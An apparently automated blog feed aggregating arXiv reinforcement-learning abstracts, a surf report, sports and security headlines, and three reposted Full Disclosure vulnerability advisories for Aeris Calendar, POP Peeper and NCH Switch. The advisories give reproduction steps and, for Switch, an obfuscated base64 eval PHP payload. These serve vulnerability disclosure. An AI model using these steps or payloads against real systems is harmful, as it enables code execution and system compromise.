In this work, we explore how probabilistic programs can be used to represent policies in sequential decision problems. In this formulation, a probabilistic program is a black-box stochastic simulator for both the problem domain and the agent. We relate classic policy gradient techniques to recently introduced black-box variational methods which generalize to probabilistic program inference. We present case studies in the Canadian traveler problem, Rock Sample, and a benchmark for optimal diagnosis inspired by Guess Who. Each study illustrates how programs can efficiently represent policies using moderate numbers of parameters.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1gErlEI
via IFTTT

Action-Conditional Video Prediction using Deep Networks in Atari Games. (arXiv:1507.08750v2 [cs.LG] UPDATED)

Motivated by vision-based reinforcement learning (RL) problems, in particular Atari games from the recent benchmark Aracade Learning Environment (ALE), we consider spatio-temporal prediction problems where future (image-)frames are dependent on control variables or actions as well as previous frames. While not composed of natural scenes, frames in Atari games are high-dimensional in size, can involve tens of objects with one or more objects being controlled by the actions directly and many other objects being influenced indirectly, can involve entry and departure of objects, and can involve deep partial observability. We propose and evaluate two deep neural network architectures that consist of encoding, action-conditional transformation, and decoding layers based on convolutional neural networks and recurrent neural networks. Experimental results show that the proposed architectures are able to generate visually-realistic frames that are also useful for control over approximately 100-step action-conditional futures in some games. To the best of our knowledge, this paper is the first to make and evaluate long-term predictions on high-dimensional video conditioned by control inputs.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1eMm3Wb
via IFTTT

Ocean City, MD's surf is at least 5.42ft high

Maryland-Delaware, December 28, 2015 at 02:00PM

Ocean City, MD Summary
At 2:00 AM, surf min of 3.08ft. At 8:00 AM, surf min of 4.72ft. At 2:00 PM, surf min of 5.42ft. At 8:00 PM, surf min of 4.12ft.

Surf maximum: 6.43ft (1.96m)
Surf minimum: 5.42ft (1.65m)
Tide height: 0.55ft (0.17m)
Wind direction: ESE
Wind speed: 22.12 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

Ravens: Despite a loss, Baltimore (4-10) inches up a spot to 28th in Week 16 NFL Power Rankings; open for full rankings (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Orioles Buzz: Baltimore reportedly keeping eye on free agent SP Mat Latos; 64-55, 3.51 ERA in 7-year career (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Encrypted Email Servers Seized by German Authorities After School Bomb Threats

In the wake of a hoax bomb threat, all public schools in Los Angeles were closed for a day last week, and now German authorities have seized an encrypted email server. But, Does that make sense? In a video statement posted on Monday, the administrator of Cock.li – an anonymous email provider service – said German authorities had seized a hard drive from one of its servers that used to


from The Hacker News http://ift.tt/1YuPqBT
via IFTTT

[FD] SIPROTEC 4 and SIPROTEC Compact FAQ #5

"SIPROTEC 4 and SIPROTEC Compact devices allow the display of extended internal statistics and test information... To access this information, the confirmation code ... needs to be provided when prompted." Good to know... http://ift.tt/1InQC2S

Source: Gmail -> IFTTT-> Blogger

I have a new follower on Twitter


Cyber Security News
#cybersecurity, #infosec, #hacking stories.


Following: 427 - Followers: 288

December 22, 2015 at 01:25PM via Twitter http://twitter.com/CyberSec__News

Alcoholics Anonymous

Jack Alexander introduced Alcoholics Anonymous to a national stage when this article was published on March 1, 1941.

from Google Alert - anonymous http://ift.tt/22nZyvC
via IFTTT

I have a new follower on Twitter


SiteSell Inc.
Helping entrepreneurs take whatever their passions are and move them from ideas to income. Social, marketing, web design, blogging. Lovers of freedom.

http://t.co/EhxyAU8jme
Following: 2873 - Followers: 14331

December 22, 2015 at 11:11AM via Twitter http://twitter.com/SiteSell

[FD] Aeris Calandar v2.1 - Buffer Overflow Vulnerability

Document Title: =============== Aeris Calandar v2.1 - Buffer Overflow Vulnerability References (Source): ==================== http://ift.tt/1MtMuJr Release Date: ============= 2015-12-01 Vulnerability Laboratory ID (VL-ID): ==================================== 1656 Common Vulnerability Scoring System: ==================================== 6.4 Product & Service Introduction: =============================== Aeris Calendar is a full-featured desktop calendar with current weather conditions, forecasts and severe weather alerts. Aeris Calendar allows you to add reminders, notes, todo`s and special events like birthdays and anniversaries. The extended forecast is displayed directly on the calendar and current conditions are displayed on the calendar, tray icon and desklet. Themes allow you to skin the calendar or you can select any image on your computer to serve as the backdrop for your calendar. (Copy of the Vendor Homepage: http://ift.tt/1V2sa8W ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a local buffer overflow web vulnerability in the official Aeris Calandar v2.1 software. Vulnerability Disclosure Timeline: ================================== 2015-12-01: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Esumsoft Product: Aeris Calendar - Software 2.1 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local unicode buffer overflow has been discovered in the official Aeris Calandar v2.1 software. The local vulnerability allows to overwrite the registers of the software process to compromise the target computer system. The classic buffer overflow vulnerability is located in the software Aeris CaLandar an attacker manipulate the bit EIP register in order to execute the next instruction of their choice. Attacker can for example execute arbitrary codes. The attacker includes a large unicode string to overwrite the EIP register of the process. Finally the attacker is able to compromise the system process of the active program. The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the local vulnerability results in system compromise by elevation of privileges via overwrite of the registers (EIP,EBP & ECX Co.). Vulnerable Module(s): [+] Weather -> Set Location > Input <> [Search] Proof of Concept (PoC): ======================= The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Launch Aeris Calandar.exe 2. Click Weather -> Set Location 3. Copy the AAAA...+ string from bof.txt to clipboard 4. Paste it the input Enter your city or zip code and press search AAAA....+ string > click Search 5. Software will crash with a BEX exception 6. Successful reproduce of the local buffer overflow vulnerability!

Source: Gmail -> IFTTT-> Blogger

[FD] POP Peeper 4.0.1 - Persistent Code Execution Vulnerability

Document Title: =============== POP Peeper 4.0.1 - Persistent Code Execution Vulnerability References (Source): ==================== http://ift.tt/1U2nTB1 Release Date: ============= 2015-11-26 Vulnerability Laboratory ID (VL-ID): ==================================== 1657 Common Vulnerability Scoring System: ==================================== 5.7 Product & Service Introduction: =============================== Email notifier that runs in the Windows task bar and alerts you when you have new email on any of account. POP Peeper is an email notifier that runs in your Windows task bar and alerts you when you have new email on your POP3, IMAP (with IDLE support), Hotmai-MSN-LiveMail, Yahoo, GMail, MyWay, Excite, iWon, Lycos.com, RediffMail, Juno and NetZero accounts. IMAP supports allows you to access AOL, AIM, Netscape and other services. Send mail directly from POP Peeper and use the address book to email your frequently used contacts. POP Peeper allows you to view messages using HTML or you can choose to safely view all messages in rich or plain text. Several options are available that will decrease or eliminate the risks of reading your email (viruses, javascript, webbugs, etc). POP Peeper can be run from a portable device and can be password protected. Many notification options are availble to indicate when new mail has arrived, such as sound alerts (configurable for each account), flashing scroll lock, skinnable popup notifier, customized screensaver and more. (Copy of the Vendor Homepage: http://ift.tt/1QVPDbk ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a code execution vulnerability in the official POP Peeper v4.0.1 software. Vulnerability Disclosure Timeline: ================================== 2015-11-23: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Esumsoft Product: POP Peeper - Software 4.0.1 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A code execution vulnerability has been discovered in the official POP Peeper v4.0.1 software. An attacker can download a remote program from a malicious URL is Register by default. I created a video that demonstrates how to download a software on a victim website created by the attacker. Proof of Concept (PoC): ======================= The vulnerability can be exploited by local attackers with low pivileged system user account and without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Launch POP Peeper.exe 2. Click Tools -> Options -> General 3. Paste malicious url in input "Email Client" 4. Click ok and Clik Compose 5. PHP code executed successfully! PoC Exploit: Video Demonstration: http://ift.tt/1ZnhWCw Security Risk: ============== The security risk of the code execution vulnerability in the POP Peeper 4.0.1 software is estimated as medium. (CVSS 5.7) Credits & Authors: ================== ZwX - (http://zwx.fr) [ http://ift.tt/1OEBOwM ] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] Switch v4.68 - Code Execution Vulnerability

Document Title: =============== Switch v4.68 - Code Execution Vulnerability References (Source): ==================== http://ift.tt/1NngqxO Release Date: ============= 2015-11-23 Vulnerability Laboratory ID (VL-ID): ==================================== 1649 Common Vulnerability Scoring System: ==================================== 8.2 Product & Service Introduction: =============================== http://ift.tt/1YuiU2N Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a code execution vulnerability in the official Switch v4.68 software. Vulnerability Disclosure Timeline: ================================== 2015-11-23: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== NCH Software Product: Switch 4.68 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local code execution vulnerability has been discovered in the official Switch v4.68 software. The bug allows a local attacker to execute malicious codes by interaction with a vulnerable software input field. The security vulnerability is present in the `url` input field when processing to convert the audio stream data. Local attackers are able to inject malicious payloads as url input for the audio convert to compromise the software system process. The vulnerability can be exploited by local attackers without interaction. The severity of the issue is high and the bug can be exploited because of a misconfigured url input validation mechanism. The security risk of the code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.2. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the software vulnerability results in system compromise by a classic url code execution. Vulnerable Module(s): [+] Convert Vulnerable Input(s): [+] url Affected Module(s): [+] Audio Stream Proof of Concept (PoC): ======================= The vulnerability can be exploited by local network attackers without privileged device user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Launch Switch.exe 2. Click convert > Convert the audio data stream 3. Paste malicious url in input `Enter url of the audio stream` 4. Click start the audio stream 5. PHP code executed successfully! PoC: Code Execution Calculator eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIy UmxLQ2RhV0doc1dYbG5ibEY2Y0dOV01HeFBVa1U1V0ZVeGVIcGxXRTR3V 2xjd2VrMXNlR3BaVjNocVRHMVdORnBUWTNCUGR6MDlKeWtwT3c9PScpKTs=')); ?> Security Risk: ============== The security risk of the code execution vulnerability in the convert module of the switch software is estimated as high. (CVSS 8.2) Credits & Authors: ================== ZwX - (http://zwx.fr) [ http://ift.tt/1OEBOwM ] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger